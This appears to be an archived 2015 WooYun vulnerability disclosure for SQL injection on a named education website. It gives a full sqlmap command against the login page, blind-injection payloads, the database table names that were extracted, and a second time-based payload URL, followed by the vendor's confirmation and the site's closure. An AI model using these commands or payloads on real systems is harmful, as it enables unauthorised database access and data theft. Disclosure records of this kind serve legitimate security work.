乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-08: 细节已通知厂商并且等待厂商处理中 2015-07-08: 厂商已经确认,细节仅向厂商公开 2015-07-08: 厂商已经修复漏洞并主动公开,细节向公众公开
sqlmap.py -u "http://sxxy.zjer.cn/gyc/check_login.php" --data "login_pwd=123&rm=1&login_name=123" --time-sec=10 -D db_sxxy --tables
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: login_name (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: login_pwd=123&rm=1&login_name=-1431' OR 1778=1778# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 OR time-based blind (comment) Payload: login_pwd=123&rm=1&login_name=123' OR SLEEP(10)#---web server operating system: Linux CentOS 5.10web application technology: Apache 2.2.3, PHP 5.1.6back-end DBMS: MySQL 5.0.12current database: 'db_sxxy'
[15:24:29] [INFO] retrieved: 14[15:24:33] [INFO] retrieved: ad_area[15:24:47] [INFO] retrieved: ad_center[15:24:59] [INFO] retrieved: area_group[15:25:28] [INFO] retrieved: att_center[15:25:48] [INFO] retrieved: att_relation[15:26:13] [INFO] retrieved: column_center[15:26:43] [INFO] retrieved: info_center[15:26:54] [INFO] retrieved: log_center[15:27:08] [INFO] retrieved: menu_option[15:27:20] [INFO] retrieved: publish_center[15:27:41] [INFO] retrieved: right_type[15:27:59] [INFO] retrieved: temp_info
第二处:http://sxxy.zjer.cn/city_res.php?f=
http://sxxy.zjer.cn/city_res.phpf=if%28now%28%29=sysdate%28%29,sleep%280%29,0%29/*%27XOR%28if%28now%28%29=sysdate%28%29,sleep%280%29,0%29%29OR%27%22XOR%28if%28now%28%29=sysdate%28%29,sleep%280%29,0%29%29OR%22*/
危害等级:高
漏洞Rank:15
确认时间:2015-07-08 21:15
感谢小伙伴的安全检测,已对该网站进行关闭处理
2015-07-08:漏洞修复前先关闭该网站